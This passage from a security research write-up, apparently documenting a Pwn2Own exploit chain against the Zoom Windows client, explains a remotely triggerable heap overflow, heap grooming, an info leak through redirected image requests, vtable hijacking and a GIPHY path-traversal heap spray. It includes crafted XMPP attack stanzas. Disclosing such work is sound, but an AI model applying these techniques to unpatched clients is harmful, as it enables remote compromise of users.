  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <recv>[email protected]</recv>
      <rres>ZoomChat_pc</rres>
      <rcid>tJKVTqrloavxzawxMZ9Kk0Dak3LaDPKKNb+vcAqMztQ=</rcid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="ResponseKey">
      <xkey create_time="1617394606">
        <pub_cert>MIICcjCCAVqgAwIBAgIBCjANBgkqhkiG9w0BAQsFADA3MSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxEjAQBgNVBAMMCSouem9vbS51czAeFw0yMTAyMTgxOTIzMjJaFw0yMjAyMTgxOTUzMjJaMEoxLDAqBgNVBAMMI2V3Y2psbmlfcndjamF5Z210cHZuZXdAeG1wcC56b29tLnVzMQ0wCwYDVQQKEwRaT09NMQswCQYDVQQGEwJVUzCBmzAQBgcqhkjOPQIBBgUrgQQAIwOBhgAEAPyPYr49WDKcwh2dc1V1GMv5whVyLaC0G/CzsvJXtSoSRouPaRBloBBlay2JpbYiZIrEBek3ONSzRd2Co1WouqXpASo2ADI/+qz3OJiOy/e4ccNzGtCDZTJHWuNVCjlV3abKX8smSDZyXc6eGP72p/xE96h80TLWpqoZHl1Ov+JiSVN/MA0GCSqGSIb3DQEBCwUAA4IBAQCUu+e8Bp9Qg/L2Kd/+AzYkmWeLw60QNVOw27rBLytiH6Ff/OmhZwwLoUbj0j3JATk/FiBpqyN6rMzL/TllWf+6oWT0ZqgdtDkYvjHWI6snTDdN60qHl77dle0Ah+VYS3VehqtqnEhy3oLiP3pGgFUcxloM85BhNGd0YMJkro+mkjvrmRGDu0cAovKrSXtqdXoQdZN1JdvSXfS2Otw/C2x+5oRB5/03aDS8Dw+A5zhCdFZlH4WKzmuWorHoHVMS1AVtfZoF0zHfxp8jpt5igdw/rFZzDxtPnivBqTKgCMSaWE5HJn9JhupHisoJUipGD8mvkxsWqYUUEI2GDauGw893</pub_cert>
        <encoded>...</encoded>
        <signature>MIGHAkIBaq/VH7MvCMnMcY+Eh6W4CN7NozmcXrRSkJJymvec+E5yWqF340QDNY1AjYJ3oc34ljLoxy7JeVjop2s9k1ZPR7cCQWnXQAViihYJyboXmPYTi0jRmmpBn61OkzD6PlAqAq1fyc8e6+e1bPsu9lwF4GkgI40NrPG/kbUx4RbiTp+Ckyo0</signature>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="50"/>
  <zmext t="1617394613961">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>false</visible>
  </zmext>
</message>

The way the key is encrypted has two options, depending on the type of key used by the recipient’s certificate. If it uses a RSA key, then the sender encrypts the message key using the public key of the recipient and signs it using their own private RSA key.

The default, however, is not to use RSA but to use an elliptic curve key using the curve P-521. Algorithms for encryption using elliptic curve keys do not exist (as far as we know). So instead of encrypting directly, elliptic curve Diffie-Helman is used using both users’ keys to obtain a shared secret. The shared secret is split into a key and IV to encrypt the message key data with AES. This is a common approach for encrypting data when using elliptic curve cryptography.

When handling a ResponseKey message, a std::string of a fixed size of 1024 bytes was allocated for the decrypted result. When decrypting using RSA, it was properly validated that the decryption result would fit in that buffer. When decrypting using AES, however, that check was missing. This meant that by sending a ResponseKey message with an AES-encrypted <encoded> element of more than 1024 bytes, it was possible to overflow a heap buffer.

The following snippet shows the function where the overflow happens. This is the SDK version, so with the logging available. Here, param_1[0] is the input buffer, param_1[1] is the input buffer’s length, param_1[2] is the output buffer and param_1[3] the output buffer length. This is a large snippet, but the important part of this function is that param_1[3] is only written to with the resulting length, it is not read first. The actual allocation of the buffer happens in a function a few steps earlier.

undefined4 __fastcall AESDecode(undefined4 *param_1, undefined4 *param_2) {
  char cVar1;
  int iVar2;
  undefined4 uVar3;
  int iVar4;
  LogMessage *this;
  int extraout_EDX;
  int iVar5;
  LogMessage local_180 [176];
  LogMessage local_d0 [176];
  int local_20;
  undefined4 *local_1c;
  int local_18;
  int local_14;
  undefined4 local_8;
  undefined4 uStack4;
  
  uStack4 = 0x170;
  local_8 = 0x101ba696;
  iVar5 = 0;
  local_14 = 0;
  local_1c = param_2;
  cVar1 = FUN_101ba34a();

  if (cVar1 == '\0') {
    return 1;
  }

  if ((*(uint *)(extraout_EDX + 4) < 0x20) || (*(uint *)(extraout_EDX + 0xc) < 0x10)) {
    iVar5 = logging::GetMinLogLevel();
    
    if (iVar5 < 2) {
      logging::LogMessage::LogMessage
                (local_d0, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1d6, 1);
      local_8 = 0;
      local_14 = 1;
      uVar3 = log_message(iVar5 + 8, "[AESDecode] Failed. Key len or IV len is incorrect.", " ");
      log_message(uVar3);
      logging::LogMessage::~LogMessage(local_d0);

      return 1;
    }

    return 1;
  }

  local_14 = param_1[2];
  local_18 = 0;
  iVar2 = EVP_CIPHER_CTX_new();

  if (iVar2 == 0) {
    return 0xc;
  }

  local_20 = iVar2;
  EVP_CIPHER_CTX_reset(iVar2);
  uVar3 = EVP_aes_256_cbc(0, *local_1c, local_1c[2], 0);
  iVar4 = EVP_CipherInit_ex(iVar2, uVar3);

  if (iVar4 < 1) {
    iVar2 = logging::GetMinLogLevel();

    if (iVar2 < 2) {
      logging::LogMessage::LogMessage
                (local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1e8, 1);
      iVar5 = 2;
      local_8 = 1;
      local_14 = 2;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherInit_ex Failed.", " ");
      log_message(uVar3);
    }
LAB_101ba758:
    if (iVar5 == 0) goto LAB_101ba852;
    this = local_d0;
  } else {
    iVar4 = EVP_CipherUpdate(iVar2, local_14, &local_18, *param_1, param_1[1]);

    if (iVar4 < 1) {
      iVar2 = logging::GetMinLogLevel();

      if (iVar2 < 2) {
        logging::LogMessage::LogMessage
                  (local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                  0x1f0, 1);
        iVar5 = 4;
        local_8 = 2;
        local_14 = 4;
        uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherUpdate Failed.", " ");
        log_message(uVar3);
      }
      goto LAB_101ba758;
    }

    param_1[3] = local_18;
    iVar4 = EVP_CipherFinal_ex(iVar2, local_14 + local_18, &local_18);

    if (0 < iVar4) {
      param_1[3] = param_1[3] + local_18;
      EVP_CIPHER_CTX_free(iVar2);
      return 0;
    }

    iVar2 = logging::GetMinLogLevel();
    if (iVar2 < 2) {
      logging::LogMessage::LogMessage
                (local_180,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1fb, 1);
      iVar5 = 8;
      local_8 = 3;
      local_14 = 8;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherFinal_ex Failed.", " ");
      log_message(uVar3);
    }

    if (iVar5 == 0) goto LAB_101ba852;
    this = local_180;
  }
  
  logging::LogMessage::~LogMessage(this);
LAB_101ba852:
  EVP_CIPHER_CTX_free(local_20);
  return 0xc;
}

Side note: we don’t know the format of what the <encoded> element would normally contain after decryption, but from our understanding of the protocol we assume it contains a key. It was easy to initiate the old version of the protocol against a new client. But to have a legitimate client initiate requires an old version of the client, which appears to be malfunctioning (it can no longer log in).

We were about 2 weeks into our research and we had found a buffer overflow we could trigger remotely without user interaction by sending a few chat messages to a user who had previously accepted external contact request or is currently in the same multi-user chat. This was looking promising.

Step 6: Path to exploitation

To build an exploit around it, it is good to first mention some pros and cons of this buffer overflow:

  • Pro: The size is not directly bounded (implicitly by the maximum size of an XMPP packet, but in practice this is way more than needed).
  • Pro: The contents are the result of decrypting the buffer, so this can be arbitrary binary data, not limited to printable or non-zero characters.
  • Pro: It triggers automatically without user interaction (as long as the attacker and victim are contacts).
  • Con: The size must be a multiple of the AES block size, 16 bytes. There can be padding at the end, but even when padding is present it will still overwrite the data up to a full block before removing the padding.
  • Con: The heap allocation is of a fixed (and quite large) size: 1040 bytes. (The backing buffer of a std::string on Windows has up to 16 extra bytes for some reason.)
  • Con: The buffer is allocated and then while handling the same packet used for the overflow. We can not place the buffer first, allocate something else and then overflow.

We did not yet have a full plan for how to exploit this, but we expected that we would most likely need to overwrite a function pointer or vtable in an object. We already knew OpenSSL was used, and it uses function pointers within structs extensively. We could even create a few already during the later handling of ResponseKey messages. We investigated this, but it quickly turned out to be impossible due to the heap allocator in use.

Step 7: Understanding the Windows heap allocator

To implement our exploit, we needed to fully understand how the heap allocator in Windows places allocations. Windows 10 includes two different heap allocators: the NT heap and the Segment Heap. The Segment Heap is new in Windows 10 and only used for specific applications, which don’t include Zoom, so the NT Heap was what is used. The NT Heap has two different allocators (for allocations less than about 16 kB): the front-end allocator (known as the Low-Fragment Heap or LFH) and the back-end allocator.

Before we go into detail for how those two allocators work, we’ll introduce some definitions:

  • Block: a memory area which can be returned by the allocator, either in use or not.
  • Bucket: a group of blocks handled by the LFH.
  • Page: a memory area assigned by the OS to a process.

By default, the back-end allocator handles all allocations. The best way to imagine the back-end allocator is as a sorted list of all free blocks (the freelist). Whenever an allocation request is received for a specific size, the list is traversed until a block is found of at least the requested size. This block is removed from the list and returned. If the block was bigger than the requested size, then it is split and the remainder is inserted in the list again. If no suitable blocks are present, the heap is extended by requesting a new page from the OS, inserting it as a new block at the appropriate location in the list. When an allocation is freed, the allocator first checks if the blocks before and after it are also free. If one or both of them are then those are merged together. The block is inserted into the list again at the location matching its size.

The following video shows how the allocator searches for a block of a specific size (orange), returns it and places the remainder back into the list (green).

The back-end allocator is fully deterministic: if you know the state of the freelist at a certain time and the sequence of allocations and frees that follow, then you can determine the new state of the list. There are some other useful properties too, such as that allocations of a specific size are last-in-first-out: if you allocate a block, free it and immediately allocate the same size, then you will always receive the same address.

The front-end allocator, or LFH, is used for allocations for sizes that are used often to reduce the amount of fragmentation. If more than 17 blocks of a specific size range are allocated and still in use, then the LFH will start handling that specific size from then on. LFH allocations are grouped in buckets each handling a range of allocation sizes. When a request for a specific size is received, the LFH checks the bucket most recently used for an allocation of that size if it still has room. If it does not, it checks if there are any other buckets for that size range with available room. If there are none, a new bucket is created.

No matter if the LFH or back-end allocator is used, each heap allocation (of less than 16 kB) has a header of eight bytes. The first four bytes are encoded, the next four are not. The encoding uses a XOR with a random key, which is used as a security measure against buffer overflows corrupting heap metadata.

For exploiting a heap overflow there are a number of things to consider. The back-end allocator can create adjacent allocations of arbitrary sizes. On the LFH, only objects in the same range are combined in a bucket, so to overwrite a block from a different range you would have to make sure two buckets are placed adjacent. In addition, which free slot from a bucket is used is randomized.

For these reasons we focused initially on the back-end allocator. We quickly realized we couldn’t use any of the OpenSSL objects we found previously: when we launch Zoom in a clean state (no existing chat history), all sizes up to around 700 bytes (and many common sizes above it too) would already be handled by the LFH. It is impossible to switch a specific size back from the LFH to the back-end allocator. Therefore, the OpenSSL objects we identified initially would be impossible to allocate after our overflowing block, as they were all less than 700 bytes so guaranteed to be placed in a LFH bucket.

This meant we had to search more thoroughly for objects of larger sizes in which we might be able to overwrite a function pointer or vtable. We found that one of the other DLL’s, zWebService.dll, includes a copy of libcurl, which gave us some extra source code to analyze. Analyzing source code was much more efficient than having to obtain information about a C++ object’s layout from a decompiler. This did give us some interesting objects to overflow that would not automatically be on the LFH.

Step 8: Heap grooming

In order to place our allocations, we would need to do some extensive heap grooming. We assumed we needed to follow the following procedure:

  1. Allocate a temporary object of 1040 bytes.
  2. Allocate the object we want to overwrite after it.
  3. Free the object of 1040 bytes.
  4. Perform the overflow, hopefully at the same address as the 1040 byte object.

In order to do this, we had to be able to make an allocation of 1040 bytes which we could free at a precise later time. But even more importantly, for this to work we would also need to fill up many holes in the freelist so our two objects would end up adjacent. If we want to allocate the objects directly adjacent, then in the first step there needs to be a free block of size 1040 + x, with x the size of the other object. But this means that there must not be any other allocations of size between 1040 and 1040 + x, otherwise that block would be used instead. This means there is a pretty large range of sizes for which there must not be any free blocks available.

To make arbitrary sized allocations, we stayed close to what we already knew. As we mentioned, if you send an encrypted message with a key identifier the other user does not yet have, then it will request that key. We noticed that this key identifier remained in a std::string in memory, likely because it was waiting for a response. It could be an arbitrary large size, so we had a way to make an allocation. It is also possible to revoke chat messages in Zoom, which would also free the pending key request. This gave us a primitive for allocating and freeing a specific size block, but it was quite crude: it would always allocate 2 copies of that string (for some reason), and in order to handle a new incoming message it would make quite a few temporary copies.

We spent a lot of time making allocations by sending messages and monitoring the state of the freelist. For this, we wrote some Frida scripts for tracking allocations, printing the freelist and checking the LFH status. These things can all be done by WinDBG, but we found it way too slow to be of use. There was one nice trick we could use: if specific allocations could get in the way of our heap grooming, then we could trigger the LFH for that size to make sure it would no longer affect the freelist by making the client perform at least 17 allocations of that size.

We spent a lot of time on this, but we ran into a problem. Sometimes, randomly, our allocation of 1040 bytes would already be placed on the LFH, even if we launched the application in a clean state. At first, we accepted this risk: a chance of around 25% to fail is still quite acceptable for the 3 attempts in Pwn2Own. But the more concrete our grooming became, the more additional objects and sizes we needed to use, such as for the objects from libcurl we might want to overwrite. With more sizes, it would get more and more likely that at least of one of them would be handled by the LFH already, completely breaking our exploit. We weren’t very keen on participating with a exploit that had already failed 75% of the time by the time the application had finished launching. We had spent a few weeks on trying to gain control over this, but eventually decided to try something else.

Step 9: To the LFH

We decided to investigate how easy it would be to perform our exploit if we forced the allocation we could overflow to the LFH, using the same method of forcing a size to the LFH first. This meant we had to search more thoroughly for objects of appropriate sizes. The allocation of 1040 bytes is placed in a bucket with all LFH allocations of 1025 bytes to 1088 bytes.

Before we go further, lets look at what defensive measures we had to deal with:

  • ASLR (Address Space Layout Randomization). This means that DLL’s are loaded in random locations and the location of the heap and stack are also randomized. However, because Zoom was a 32-bit application, there is not a very large range of possible addresses for DLL’s and for the heap.
  • DEP (Data Execution Prevention). This meant that there were no memory pages present that were both writable and executable.
  • CFG (Control Flow Guard). This is a relatively new technique that is used to check that function pointers and other dynamic addresses point to a valid start location of a function.

We noticed that ASLR and DEP were used correctly by Zoom, but the use of CFG had a weakness: the 2 OpenSSL DLL’s did not have CFG enabled due to an incompatibility in OpenSSL, which was very helpful for us.

CFG works by inserting a check (guard_check_icall) before all dynamic function calls which looks up the address that is about to be called in a list of valid function start addresses. If it is valid, the call is allowed. If not, an exception is raised.

Not enabling CFG for a dll means two things:

  • Any dynamic function call by this library does not check if the address is a function start location. In other words, guard_check_icall is not inserted.
  • Any dynamic function call from another library which does use CFG which calls an address in these dlls is always allowed. The valid start location list is not present for these dlls, which means that it allows all addresses in the range of that dll.

Based on this, we formed the following plan:

  1. Leak an address from one of the two OpenSSL DLL’s to deal with ASLR.
  2. Overflow a vtable or function pointer to point to a location in the DLL we have located.
  3. Use a ROP chain to gain arbitrary code execution.

To perform our buffer overflow on the LFH, we needed a way to deal with the randomization. While not perfect, one way we avoided a lot of crashes was to create a lot of new allocations in the size range and then freeing all but the last one. As we mentioned, the LFH returns a random free slot from the current bucket. If the current bucket is full, it looks if there are other not yet full buckets of the same size range. If there are none, the heap is extended and a new bucket is created.

By allocating many new blocks, we guaranteed that all buckets for this size range were full and we got a new bucket. Freeing a number of these allocations, but keeping the last block meant we had a lot of room in this bucket. As long as we didn’t allocate more blocks than would fit, all allocations of our size range would come from here. This was very helpful for reducing the chance of overwriting other objects that happen to fall in the same size range.

The following video shows the “dangerous” objects we don’t want to overwrite in orange, and the safe objects we created in green:

As long as Bucket 3 didn’t fill up completely, all allocations for the targeted size range would happen in that bucket, allowing us to avoid overwriting the orange objects. So long as no new “orange” objects were created, we could freely try again and again. The randomization would actually help us ensure that we would eventually obtain the object layout we wanted.

Step 10: Info leak

Turning a buffer overflow into an information leak is quite a challenge, as it depends heavily on the functionality which is available in the application. Common ways would be to allocate something which has a length field, overflow over the length field and then read the field. This did not work for us: we did not find any available functionality in Zoom to send something with an allocation of 1025-1088 with a length field and with a way to request it again. It is possible that it does exist, but analyzing the object layout of the C++ objects was a slow process.

We took a good look at the parts we had code for, and we found a method, although it was tricky.

When libcurl is used to request a URL it will parse and encode the URL and copy the relevant fields into an internal structure. The path and query components of the URL are stored in different, heap allocated blocks with a zero-terminator. Any required URL encoding will already have taken place, so when the request is sent the entire string is copied to the socket until it gets to the first null-byte.

We had found a way to initiate HTTPS requests to a server we control. The method was by sending a weird combination of two stanzas Zoom would normally use, one for sending an invitation to add a user and one notifying the user that a new bot was added to their account. A string from the stanza is then appended to a domain to download an image. However, the string of the prepended domain does not end with a /, so it is possible to extend it to end up at a different domain.

A stanza for requesting another user to be added to your contact list:

<presence xmlns="jabber:client" type="subscribe" email="[email of other user]" from="[email protected]/ZoomChat_pc">
  <status>{"e":"[email protected]","screenname":"John Doe","t":1617178959313}</status>
</presence>

The stanza informing a user that a new bot (in this case, SurveyMonkey) was added to their account:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc" type="probe">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:1">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>

While a client only expects this stanza from the server, it is possible to send it from a different user account. It is then handled if the sender is not yet in the user’s contact list. So combining these two things, we ended up with the following:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:0">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>

The pic_url attribute here is ignored. Instead, the pic_relative_url attribute is used, with "https://marketplacecontent.zoom.us" prepended to it. This means a request is performed to:

"https://marketplacecontent.zoom.us" + image
"https://marketplacecontent.zoom.us" + "example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"
"https://marketplacecontent.zoom.usexample.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"

Because this is not restricted to subdomains of zoom.us, we could redirect it to a server we control.

We are still not fully sure why this worked, but it worked. This is one of two additional, low impact bugs we used for our attack and which is also currently fixed according to the Zoom Security Bulletin. On its own, this could be used to obtain the external IP address of another user if they are signed in to Zoom, even when you are not a contact.

Setting up a direct connection was very helpful for us, because we had much more control over this connection than over the XMPP connection. The XMPP connection is not direct, but through the server. This meant that invalid XML would not reach us. As the addresses we wanted to leak was unlikely to consist of entirely printable characters, we couldn’t try to get these included in a stanza that would reach us. With a direct connection, we were not restricted in any way.

Our plan was to do the following:

  1. Initiate a HTTPS request using a URL with a query part of 1087 bytes to a server we control.
  2. Accept the connection, but delay responding to the TLS handshake.
  3. Trigger the buffer overflow such that the buffer we overflow is immediately before the block containing the query part of the URL. This overwrites the heap header of the query block, the entire query (including the zero-terminator at the end) and the next heap header.
  4. Let the TLS handshake proceed.
  5. Receive the query, with the heap header and start of the next block in the HTTP request.

This video illustrates how this works:

In essence, this similar to creating an object, overwriting a length field and reading it. Instead of a counter for the length, we overwrite the zero-terminator of a string by writing all the way over the contents of a buffer.

This allowed us to leak data from the start of the next block up to the first null-byte in it. Conveniently, we had also found an interesting object to place there in the source of OpenSSL, libcrypto-1_1.dll to be specific. TLS1_PRF_PKEY_CTX is an object which is used during a TLS handshake to verify a MAC of the transcript during a handshake, to make sure an active attacker has not changed anything during the handshake. This struct starts with a pointer to another structure inside the same DLL (a static structure for a hashing function).

typedef struct {
    /* Digest to use for PRF */
    const EVP_MD *md;
    /* Secret value to use for PRF */
    unsigned char *sec;
    size_t seclen;
    /* Buffer of concatenated seed data */
    unsigned char seed[TLS1_PRF_MAXBUF];
    size_t seedlen;
} TLS1_PRF_PKEY_CTX;

There is one downside to this object: it is created, used and deallocated within one function call. But luckily, OpenSSL does not clear the full contents of the object, so the pointer at the start remains in the deallocated block:

static void pkey_tls1_prf_cleanup(EVP_PKEY_CTX *ctx)
{
    TLS1_PRF_PKEY_CTX *kctx = ctx->data;
    OPENSSL_clear_free(kctx->sec, kctx->seclen);
    OPENSSL_cleanse(kctx->seed, kctx->seedlen);
    OPENSSL_free(kctx);
}

This means that we could leak the pointer we want, but in order to do so we would need to place three objects just right. We needed to place 3 blocks in the right order in a bucket: the block we overflow, the query part of a URL for our initiated HTTPS request and a deallocated TLS1_PRF_PKEY_CTX object. One common way for defeating heap randomization in exploits is to just allocate a lot of objects and try often, but it’s not that simple in this case: we need enough objects and overflows to have a chance of success, but also not too many to still allow deallocated TLS1_PRF_PKEY_CTX objects to remain. If we allocated too many queries, no TLS1_PRF_PKEY_CTX objects would be left. This was a difficult balance to hit.

We tried this a lot and it took days, but eventually we leaked the address once. Then, a few days later, it worked again. And then again the same day. Slowly we were finding the right balance of the number of objects, connections and overflows.

The @z\x15p (0x70157a40) here is the leaked address in libcrypto-1_1.dll:

One thing that greatly increased the chances of success was to use TLS renegotiation. The TLS1_PRF_PKEY_CTX object is created during a handshake, but setting up new connections takes time and does a lot of allocations that could disturb our heap bucket. We found that we could also set up a connection and use TLS renegotiation repeatedly, which meant that the handshake was performed again but nothing else. OpenSSL supports renegotation, and even if you want to renegotiate thousands of times without ever sending a HTTP response this is entirely fine. We ended up creating 3 connections to a webserver that was doing nothing other than constantly renegotiating. This allowed us to create a constant stream of new deallocated TLS1_PRF_PKEY_CTX objects in the deallocated space in the bucket.

The info leak did however remain the most unstable part of our exploit. If you watch the video of our exploit back, then the longest delay will be waiting for the info leak. Vincent from ZDI mentions when the info leak happens during the second attempt. As you can see, the rest of the exploit completes quite quickly after that.

Step 11: Control

The next step was to find an object where we could overwrite a vtable or function pointer. Here, again, we found a useful open source component in a DLL. The file viper.dll contains a copy of the WebRTC library from around 2012. Initially, we found that when a call invite is received (even if it is not answered), viper.dll creates 5 objects of 1064 bytes which all start with a vtable. By searching the WebRTC source code we found that these were FileWrapperImpl objects. These can be seen as adding a C++ API around FILE * pointers from C: methods for writing and reading data, automatic closing and flushing in the destructor, etc. There was one downside: these 5 objects were doing nothing. If we overwrote their vtable in the debugger, nothing would happen until we exited Zoom, only then the destructor would call some vtable functions.

class FileWrapperImpl : public FileWrapper {
 public:
  FileWrapperImpl();
  ~FileWrapperImpl() override;

  int FileName(char* file_name_utf8, size_t size) const override;

  bool Open() const override;

  int OpenFile(const char* file_name_utf8,
               bool read_only,
               bool loop = false,
               bool text = false) override;

  int OpenFromFileHandle(FILE* handle,
                         bool manage_file,
                         bool read_only,
                         bool loop = false) override;

  int CloseFile() override;
  int SetMaxFileSize(size_t bytes) override;
  int Flush() override;

  int Read(void* buf, size_t length) override;
  bool Write(const void* buf, size_t length) override;
  int WriteText(const char* format, ...) override;
  int Rewind() override;

 private:
  int CloseFileImpl();
  int FlushImpl();

  std::unique_ptr<RWLockWrapper> rw_lock_;

  FILE* id_;
  bool managed_file_handle_;
  bool open_;
  bool looping_;
  bool read_only_;
  size_t max_size_in_bytes_;  // -1 indicates file size limitation is off
  size_t size_in_bytes_;
  char file_name_utf8_[kMaxFileNameSize];
};

Code execution at exit was far from ideal: this would mean we had just one shot in each attempt. If we had failed to overwrite a vtable we would have no chance to try again. We also did not have a way to remotely trigger a clean exit, but even if we had, the chance we could exit successfully were small. The information leak will have corrupted many objects and heap metadata in the previous phase, which maybe didn’t affect anything yet if those objects are unused, but if we tried to exit could cause a crash due to destructors or freeing.

Based on the WebRTC source code, we noticed the FileWrapperImpl objects are often used in classes related to audio playback. As it happens, the Windows VM Thijs was using at that time did not have an emulated sound card. There was no need for one, as we were not looking at exploiting the actual meeting functionality. Daan suggested to add one, because it could matter for these objects. Thijs was skeptical, but security involves trying a lot of things you don’t expect to work, so he added one. After this, the creation of FileWrapperImpls had indeed changed significantly.

With a emulated sound card, new FileWrapperImpls were created and destroyed regularly while the call was ringing. Each loop of the jingle seemed to trigger a number of allocations and frees of these objects. It is a shame the videos we have of the exploit do not have sound: you would have heard the ringing sound complete a couple of full loops at the moment it exits and calc is started.

This meant we had a vtable pointer we could overwrite quite reliably, but now the question is: what to write there?

Step 12: GIPHY time

We had obtained the offset of libcrypto-1_1.dll using our information leak, but we also needed an address of data under our control: if we overwrite a vtable pointer, then it needs to point to an area containing one or more function pointers. ASLR means we don’t know for sure where our heap allocations end up. To deal with this, we used GIFs.

Hack the planet GIPHY

To send an out-of-meeting message in Zoom, the receiving user has to have previously accepted a connect request or be in a multi-user chat with the attacker. If a user is able to send a message with an image to another user in Zoom, then that image is downloaded and shown automatically if it is below a few megabytes. If it is larger, the user needs to click on it to download it.

In the Zoom chat client, it is also possible to send GIFs from GIPHY. For these images, the file size restriction is not applied and the files are always downloaded and shown. User uploads and GIPHY files are both downloaded from the same domain, but using different paths. By sending an XMPP message for sending a GIPHY, but using path traversal to point it to a user uploaded GIF file instead, we found that we could allow the downloading of arbitrary sized GIF files. If the file is a valid GIF file, then it is loaded into memory. If we send the same link again then it is not downloaded twice, but a new copy is allocated in memory. This is the second low impact vulnerability we used, which is also fixed according to the Zoom Security Bulletin.

A normal GIPHY message:

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
  <thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <sns>
    <format>%[email protected] sent you an image</format>
    <args>
      <arg>John Doe</arg>
    </args>
  </sns>
  <zmext>
    <msg_type>12</msg_type>
    <from n="John Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
    <msg_feature>16384</msg_feature>
  </zmext>
  <giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker">
    <pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/>
    <mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/>
    <bigPicInfo url="https://file.zoom.us/external/link/issue?id=1::hA-lI2ZGxBzgJczWbR4yPQ::ZxQquub32hKf5Tle_fRKGQ::TnskidmcXKrAUhyi4UP_QGp2qGXkApB2u9xEFRp5RHsZu1F6EL1zd-6mAaU7Cm0TiPQnALOnk1-ggJhnbL_S4czgttgdHVRKHP015TcbRo92RVCI351AO8caIsVYyEW5zpoTSmwsoR8t5E6gv4Wbmjx263lTi 1aWl62KifvJ_LDECBM1" size="4322534"/>
  </giphyv2>
</message>

A GIPHY message with a manipulated path (only the bigPicInfo URL is relevant):

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
  <thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <sns>
    <format>%[email protected] sent you an image</format>
    <args>
